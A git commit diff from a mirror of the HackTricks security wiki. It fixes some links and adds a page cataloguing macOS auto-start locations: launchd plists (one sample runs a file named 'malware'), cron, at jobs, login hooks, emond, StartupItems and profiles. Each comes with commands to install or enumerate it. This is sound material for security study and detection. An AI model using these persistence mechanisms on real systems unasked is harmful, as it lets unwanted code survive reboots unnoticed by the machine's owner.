mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GITBOOK-3964: change request with no subject merged in GitBook
This commit is contained in:
parent
90af824f9f
commit
2f0f8ff2dd
18 changed files with 686 additions and 47 deletions
21
SUMMARY.md
21
SUMMARY.md
|
@ -140,17 +140,19 @@
|
||||||
|
|
||||||
* [macOS Security & Privilege Escalation](macos-hardening/macos-security-and-privilege-escalation/README.md)
|
* [macOS Security & Privilege Escalation](macos-hardening/macos-security-and-privilege-escalation/README.md)
|
||||||
* [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
|
* [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
|
||||||
* [macOS Files, Folders & Binaries](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md)
|
* [macOS Files, Folders, Binaries & Memory](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md)
|
||||||
* [macOS Bundles](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md)
|
* [macOS Bundles](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md)
|
||||||
|
* [macOS Memory Dumping](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md)
|
||||||
|
* [macOS Sensitive Locations](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md)
|
||||||
* [macOS Universal binaries & Mach-O Format](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)
|
* [macOS Universal binaries & Mach-O Format](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)
|
||||||
* [macOS Proces Abuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md)
|
* [macOS Proces Abuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md)
|
||||||
* [macOS IPC - Inter Process Communication](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md)
|
* [macOS IPC - Inter Process Communication](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md)
|
||||||
* [macOS XPC Connecting Process Check](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md)
|
* [macOS XPC Connecting Process Check](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md)
|
||||||
* [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-pid-reuse.md)
|
* [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md)
|
||||||
* [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc-authorization.md)
|
* [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md)
|
||||||
* [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md)
|
* [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md)
|
||||||
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
|
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
|
||||||
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||||
* [macOS AppleFS](macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md)
|
* [macOS AppleFS](macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md)
|
||||||
* [macOS Kernel](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md)
|
* [macOS Kernel](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md)
|
||||||
* [macOS Kernel Extensions](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md)
|
* [macOS Kernel Extensions](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md)
|
||||||
|
@ -160,13 +162,14 @@
|
||||||
* [macOS Objective-C](macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md)
|
* [macOS Objective-C](macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md)
|
||||||
* [macOS Network Services & Protocols](macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md)
|
* [macOS Network Services & Protocols](macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md)
|
||||||
* [macOS File Extension Apps](macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md)
|
* [macOS File Extension Apps](macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md)
|
||||||
* [macOS TCC](macos-hardening/macos-security-and-privilege-escalation/macos-tcc/README.md)
|
* [macOS TCC](macos-hardening/macos-security-and-privilege-escalation/macos-tcc.md)
|
||||||
* [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-tcc/macos-apple-scripts.md)
|
* [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-tcc/macos-apple-scripts.md)
|
||||||
* [macOS Sandbox](macos-hardening/macos-security-and-privilege-escalation/macos-sandbox/README.md)
|
* [macOS Sandbox](macos-hardening/macos-security-and-privilege-escalation/macos-sandbox/README.md)
|
||||||
* [macOS Sandbox Debug & Bypass](macos-hardening/macos-security-and-privilege-escalation/macos-sandbox/macos-sandbox-debug-and-bypass.md)
|
* [macOS Sandbox Debug & Bypass](macos-hardening/macos-security-and-privilege-escalation/macos-sandbox/macos-sandbox-debug-and-bypass.md)
|
||||||
* [macOS Apps - Inspecting, debugging and Fuzzing](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md)
|
* [macOS Apps - Inspecting, debugging and Fuzzing](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md)
|
||||||
* [Introduction to ARM64](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
* [Introduction to ARM64](macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
* [macOS Red Teaming](macos-hardening/macos-red-teaming.md)
|
* [macOS Red Teaming](macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming.md)
|
||||||
|
* [macOS Auto Start Locations](macos-hardening/macos-auto-start-locations.md)
|
||||||
|
|
||||||
## 🪟 Windows Hardening
|
## 🪟 Windows Hardening
|
||||||
|
|
||||||
|
|
377
macos-hardening/macos-auto-start-locations.md
Normal file
377
macos-hardening/macos-auto-start-locations.md
Normal file
|
@ -0,0 +1,377 @@
|
||||||
|
# macOS Auto Start Locations
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Here are locations on the system that could lead to the **execution** of a binary **without** **user** **interaction**.
|
||||||
|
|
||||||
|
### Launchd
|
||||||
|
|
||||||
|
**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in:
|
||||||
|
|
||||||
|
* `/Library/LaunchAgents`: Per-user agents installed by the admin
|
||||||
|
* `/Library/LaunchDaemons`: System-wide daemons installed by the admin
|
||||||
|
* `/System/Library/LaunchAgents`: Per-user agents provided by Apple.
|
||||||
|
* `/System/Library/LaunchDaemons`: System-wide daemons provided by Apple.
|
||||||
|
|
||||||
|
When a user logs in the plists located in `/Users/$USER/Library/LaunchAgents` and `/Users/$USER/Library/LaunchDemons` are started with the **logged users permissions**.
|
||||||
|
|
||||||
|
The **main difference between agents and daemons is that agents are loaded when the user logs in and the daemons are loaded at system startup** (as there are services like ssh that needs to be executed before any user access the system). Also agents may use GUI while daemons need to run in the background.
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
|
||||||
|
<plist version="1.0">
|
||||||
|
<dict>
|
||||||
|
<key>Label</key>
|
||||||
|
<string>com.apple.someidentifier</string>
|
||||||
|
<key>ProgramArguments</key>
|
||||||
|
<array>
|
||||||
|
<string>/Users/username/malware</string>
|
||||||
|
</array>
|
||||||
|
<key>RunAtLoad</key><true/> <!--Execute at system startup-->
|
||||||
|
<key>StartInterval</key>
|
||||||
|
<integer>800</integer> <!--Execute each 800s-->
|
||||||
|
<key>KeepAlive</key>
|
||||||
|
<dict>
|
||||||
|
<key>SuccessfulExit</key></false> <!--Re-execute if exit unsuccessful-->
|
||||||
|
<!--If previous is true, then re-execute in successful exit-->
|
||||||
|
</dict>
|
||||||
|
</dict>
|
||||||
|
</plist>
|
||||||
|
```
|
||||||
|
|
||||||
|
There are cases where an **agent needs to be executed before the user logins**, these are called **PreLoginAgents**. For example, this is useful to provide assistive technology at login. They can be found also in `/Library/LaunchAgents`(see [**here**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) an example).
|
||||||
|
|
||||||
|
\{% hint style="info" %\} New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load <target.plist>` It's **also possible to load .plist files without that extension** with `launchctl -F <file>` (however those plist files won't be automatically loaded after reboot).\
|
||||||
|
It's also possible to **unload** with `launchctl unload <target.plist>` (the process pointed by it will be terminated),
|
||||||
|
|
||||||
|
To **ensure** that there isn't **anything** (like an override) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` \{% endhint %\}
|
||||||
|
|
||||||
|
List all the agents and daemons loaded by the current user:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
launchctl list
|
||||||
|
```
|
||||||
|
|
||||||
|
### Cron
|
||||||
|
|
||||||
|
List the cron jobs of the **current user** with:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
crontab -l
|
||||||
|
```
|
||||||
|
|
||||||
|
You can also see all the cron jobs of the users in **`/usr/lib/cron/tabs/`** and **`/var/at/tabs/`** (needs root).
|
||||||
|
|
||||||
|
In MacOS several folders executing scripts with **certain frequency** can be found in:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
|
||||||
|
```
|
||||||
|
|
||||||
|
There you can find the regular **cron** **jobs**, the **at** **jobs** (not very used) and the **periodic** **jobs** (mainly used for cleaning temporary files). The daily periodic jobs can be executed for example with: `periodic daily`.
|
||||||
|
|
||||||
|
The periodic scripts (**`/etc/periodic`**) are executed because of the **launch daemons** configured in `/System/Library/LaunchDaemons/com.apple.periodic*`. Note that if a script is stored in `/etc/periodic/` as a way to **escalate privilege**s, it will be **executed** as the **owner of the file**.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
|
||||||
|
-rw-r--r-- 1 root wheel 887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
|
||||||
|
-rw-r--r-- 1 root wheel 895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
|
||||||
|
-rw-r--r-- 1 root wheel 891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist
|
||||||
|
```
|
||||||
|
|
||||||
|
### kext
|
||||||
|
|
||||||
|
In order to install a KEXT as a startup item, it needs to be **installed in one of the following locations**:
|
||||||
|
|
||||||
|
* `/System/Library/Extensions`
|
||||||
|
* KEXT files built into the OS X operating system.
|
||||||
|
* `/Library/Extensions`
|
||||||
|
* KEXT files installed by 3rd party software
|
||||||
|
|
||||||
|
You can list currently loaded kext files with:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
kextstat #List loaded kext
|
||||||
|
kextload /path/to/kext.kext #Load a new one based on path
|
||||||
|
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
|
||||||
|
kextunload /path/to/kext.kext
|
||||||
|
kextunload -b com.apple.driver.ExampleBundle
|
||||||
|
```
|
||||||
|
|
||||||
|
For more information about [**kernel extensions check this section**](macos-security-and-privilege-escalation/mac-os-architecture#i-o-kit-drivers).
|
||||||
|
|
||||||
|
### **Login Items**
|
||||||
|
|
||||||
|
In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**.\
|
||||||
|
It it's possible to list them, add and remove from the command line:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#List all items:
|
||||||
|
osascript -e 'tell application "System Events" to get the name of every login item'
|
||||||
|
|
||||||
|
#Add an item:
|
||||||
|
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'
|
||||||
|
|
||||||
|
#Remove an item:
|
||||||
|
osascript -e 'tell application "System Events" to delete login item "itemname"'
|
||||||
|
```
|
||||||
|
|
||||||
|
These items are stored in the file /Users/\<username>/Library/Application Support/com.apple.backgroundtaskmanagementagent
|
||||||
|
|
||||||
|
### At
|
||||||
|
|
||||||
|
“At tasks” are used to **schedule tasks at specific times**.\
|
||||||
|
These tasks differ from cron in that **they are one time tasks** t**hat get removed after executing**. However, they will **survive a system restart** so they can’t be ruled out as a potential threat.
|
||||||
|
|
||||||
|
By **default** they are **disabled** but the **root** user can **enable** **them** with:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
|
||||||
|
```
|
||||||
|
|
||||||
|
This will create a file at 13:37:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo hello > /tmp/hello | at 1337
|
||||||
|
```
|
||||||
|
|
||||||
|
If AT tasks aren't enabled the created tasks won't be executed.
|
||||||
|
|
||||||
|
### Login/Logout Hooks
|
||||||
|
|
||||||
|
They are deprecated but can be used to execute commands when a user logs in.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cat > $HOME/hook.sh << EOF
|
||||||
|
#!/bin/bash
|
||||||
|
echo 'My is: \`id\`' > /tmp/login_id.txt
|
||||||
|
EOF
|
||||||
|
chmod +x $HOME/hook.sh
|
||||||
|
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
This setting is stored in `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist`
|
||||||
|
|
||||||
|
```bash
|
||||||
|
defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
|
||||||
|
{
|
||||||
|
LoginHook = "/Users/username/hook.sh";
|
||||||
|
MiniBuddyLaunch = 0;
|
||||||
|
TALLogoutReason = "Shut Down";
|
||||||
|
TALLogoutSavesState = 0;
|
||||||
|
oneTimeSSMigrationComplete = 1;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
To delete it:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
defaults delete com.apple.loginwindow LoginHook
|
||||||
|
```
|
||||||
|
|
||||||
|
In the previous example we have created and deleted a **LoginHook**, it's also possible to create a **LogoutHook**.
|
||||||
|
|
||||||
|
The root user one is stored in `/private/var/root/Library/Preferences/com.apple.loginwindow.plist`
|
||||||
|
|
||||||
|
### Emond
|
||||||
|
|
||||||
|
Apple introduced a logging mechanism called **emond**. It appears it was never fully developed, and development may have been **abandoned** by Apple for other mechanisms, but it remains **available**.
|
||||||
|
|
||||||
|
This little-known service may **not be much use to a Mac admin**, but to a threat actor one very good reason would be to use it as a **persistence mechanism that most macOS admins probably wouldn't know** to look for. Detecting malicious use of emond shouldn't be difficult, as the System LaunchDaemon for the service looks for scripts to run in only one place:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ls -l /private/var/db/emondClients
|
||||||
|
```
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
**As this isn't used much, anything in that folder should be suspicious**
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
### Startup Items
|
||||||
|
|
||||||
|
\{% hint style="danger" %\} **This is deprecated, so nothing should be found in the following directories.** \{% endhint %\}
|
||||||
|
|
||||||
|
A **StartupItem** is a **directory** that gets **placed** in one of these two folders. `/Library/StartupItems/` or `/System/Library/StartupItems/`
|
||||||
|
|
||||||
|
After placing a new directory in one of these two locations, **two more items** need to be placed inside that directory. These two items are a **rc script** **and a plist** that holds a few settings. This plist must be called “**StartupParameters.plist**”.
|
||||||
|
|
||||||
|
{% tabs %}
|
||||||
|
{% tab title="StartupParameters.plist" %}
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||||
|
<plist version="1.0">
|
||||||
|
<dict>
|
||||||
|
<key>Description</key>
|
||||||
|
<string>This is a description of this service</string>
|
||||||
|
<key>OrderPreference</key>
|
||||||
|
<string>None</string> <!--Other req services to execute before this -->
|
||||||
|
<key>Provides</key>
|
||||||
|
<array>
|
||||||
|
<string>superservicename</string> <!--Name of the services provided by this file -->
|
||||||
|
</array>
|
||||||
|
</dict>
|
||||||
|
</plist>
|
||||||
|
```
|
||||||
|
{% endtab %}
|
||||||
|
|
||||||
|
{% tab title="superservicename" %}
|
||||||
|
```bash
|
||||||
|
#!/bin/sh
|
||||||
|
. /etc/rc.common
|
||||||
|
|
||||||
|
StartService(){
|
||||||
|
touch /tmp/superservicestarted
|
||||||
|
}
|
||||||
|
|
||||||
|
StopService(){
|
||||||
|
rm /tmp/superservicestarted
|
||||||
|
}
|
||||||
|
|
||||||
|
RestartService(){
|
||||||
|
echo "Restarting"
|
||||||
|
}
|
||||||
|
|
||||||
|
RunService "$1"
|
||||||
|
```
|
||||||
|
{% endtab %}
|
||||||
|
{% endtabs %}
|
||||||
|
|
||||||
|
### /etc/rc.common
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
**This isn't working in modern MacOS versions**
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
It's also possible to place here **commands that will be executed at startup.** Example os regular rc.common script:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#
|
||||||
|
# Common setup for startup scripts.
|
||||||
|
#
|
||||||
|
# Copyright 1998-2002 Apple Computer, Inc.
|
||||||
|
#
|
||||||
|
|
||||||
|
######################
|
||||||
|
# Configure the shell #
|
||||||
|
######################
|
||||||
|
|
||||||
|
#
|
||||||
|
# Be strict
|
||||||
|
#
|
||||||
|
#set -e
|
||||||
|
set -u
|
||||||
|
|
||||||
|
#
|
||||||
|
# Set command search path
|
||||||
|
#
|
||||||
|
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH
|
||||||
|
|
||||||
|
#
|
||||||
|
# Set the terminal mode
|
||||||
|
#
|
||||||
|
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
|
||||||
|
# TERM=$(tset - -Q); export TERM
|
||||||
|
#fi
|
||||||
|
|
||||||
|
###################
|
||||||
|
# Useful functions #
|
||||||
|
###################
|
||||||
|
|
||||||
|
#
|
||||||
|
# Determine if the network is up by looking for any non-loopback
|
||||||
|
# internet network interfaces.
|
||||||
|
#
|
||||||
|
CheckForNetwork()
|
||||||
|
{
|
||||||
|
local test
|
||||||
|
|
||||||
|
if [ -z "${NETWORKUP:=}" ]; then
|
||||||
|
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
|
||||||
|
if [ "${test}" -gt 0 ]; then
|
||||||
|
NETWORKUP="-YES-"
|
||||||
|
else
|
||||||
|
NETWORKUP="-NO-"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
alias ConsoleMessage=echo
|
||||||
|
|
||||||
|
#
|
||||||
|
# Process management
|
||||||
|
#
|
||||||
|
GetPID ()
|
||||||
|
{
|
||||||
|
local program="$1"
|
||||||
|
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
|
||||||
|
local pid=""
|
||||||
|
|
||||||
|
if [ -f "${pidfile}" ]; then
|
||||||
|
pid=$(head -1 "${pidfile}")
|
||||||
|
if ! kill -0 "${pid}" 2> /dev/null; then
|
||||||
|
echo "Bad pid file $pidfile; deleting."
|
||||||
|
pid=""
|
||||||
|
rm -f "${pidfile}"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ -n "${pid}" ]; then
|
||||||
|
echo "${pid}"
|
||||||
|
return 0
|
||||||
|
else
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generic action handler
|
||||||
|
#
|
||||||
|
RunService ()
|
||||||
|
{
|
||||||
|
case $1 in
|
||||||
|
start ) StartService ;;
|
||||||
|
stop ) StopService ;;
|
||||||
|
restart) RestartService ;;
|
||||||
|
* ) echo "$0: unknown argument: $1";;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Profiles
|
||||||
|
|
||||||
|
Configuration profiles can force a user to use certain browser settings, DNS proxy settings, or VPN settings. Many other payloads are possible which make them ripe for abuse.
|
||||||
|
|
||||||
|
You can enumerate them running:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ls -Rl /Library/Managed\ Preferences/
|
||||||
|
```
|
||||||
|
|
||||||
|
### Other persistence techniques and tools
|
||||||
|
|
||||||
|
* [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift)
|
||||||
|
* [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
|
@ -92,7 +92,7 @@ Being able to **create a file** that is going to be **used by root**, allows a u
|
||||||
|
|
||||||
### Entitlements and Privileges abuse via process abuse
|
### Entitlements and Privileges abuse via process abuse
|
||||||
|
|
||||||
If a process can **inject code in another process with better privileges or entitlements** or contact it to perform privileges actions, he could escalate privileges and bypass defensive meassures such as [Sandbox](macos-sandbox/) or [TCC](macos-tcc/).
|
If a process can **inject code in another process with better privileges or entitlements** or contact it to perform privileges actions, he could escalate privileges and bypass defensive meassures such as [Sandbox](macos-sandbox/) or [TCC](macos-tcc.md).
|
||||||
|
|
||||||
{% content-ref url="broken-reference" %}
|
{% content-ref url="broken-reference" %}
|
||||||
[Broken link](broken-reference)
|
[Broken link](broken-reference)
|
||||||
|
|
|
@ -84,8 +84,8 @@ kextunload com.apple.iokit.IOReportFamily
|
||||||
|
|
||||||
### IPC - Inter Process Communication
|
### IPC - Inter Process Communication
|
||||||
|
|
||||||
{% content-ref url="../macos-proces-abuse/macos-ipc-inter-process-communication/" %}
|
{% content-ref url="macos-ipc-inter-process-communication/" %}
|
||||||
[macos-ipc-inter-process-communication](../macos-proces-abuse/macos-ipc-inter-process-communication/)
|
[macos-ipc-inter-process-communication](macos-ipc-inter-process-communication/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## macOS Kernel Extensions
|
## macOS Kernel Extensions
|
||||||
|
|
|
@ -256,7 +256,7 @@ int main(int argc, const char * argv[]) {
|
||||||
|
|
||||||
In this page different ways to hook functions were discussed. However, they involved **running code inside the process to attack**.
|
In this page different ways to hook functions were discussed. However, they involved **running code inside the process to attack**.
|
||||||
|
|
||||||
In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](macos-library-injection/macos-dyld-hijacking-and-dyld\_insert\_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port).
|
In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](../macos-dyld-hijacking-and-dyld\_insert\_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port).
|
||||||
|
|
||||||
However, both options are **limited** to **unprotected** binaries/processes. Check each technique to learn more about the limitations.
|
However, both options are **limited** to **unprotected** binaries/processes. Check each technique to learn more about the limitations.
|
||||||
|
|
|
@ -411,8 +411,8 @@ It was possible to **inject a simple shellcode** to execute a command because it
|
||||||
|
|
||||||
You can find **example dylibs** in (for example the one that generates a log and then you can listen to it):
|
You can find **example dylibs** in (for example the one that generates a log and then you can listen to it):
|
||||||
|
|
||||||
{% content-ref url="../macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
{% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
||||||
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../macos-library-injection/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
<details>
|
<details>
|
|
@ -1,4 +1,4 @@
|
||||||
# macOS Files, Folders & Binaries
|
# macOS Files, Folders, Binaries & Memory
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -45,8 +45,8 @@
|
||||||
|
|
||||||
MacOS stores information such as passwords in several places:
|
MacOS stores information such as passwords in several places:
|
||||||
|
|
||||||
{% content-ref url="broken-reference" %}
|
{% content-ref url="macos-sensitive-locations.md" %}
|
||||||
[Broken link](broken-reference)
|
[macos-sensitive-locations.md](macos-sensitive-locations.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## OS X Specific Extensions
|
## OS X Specific Extensions
|
||||||
|
@ -152,8 +152,8 @@ Mac OS binaries usually are compiled as **universal binaries**. A **universal bi
|
||||||
|
|
||||||
## macOS memory dumping
|
## macOS memory dumping
|
||||||
|
|
||||||
{% content-ref url="broken-reference" %}
|
{% content-ref url="macos-memory-dumping.md" %}
|
||||||
[Broken link](broken-reference)
|
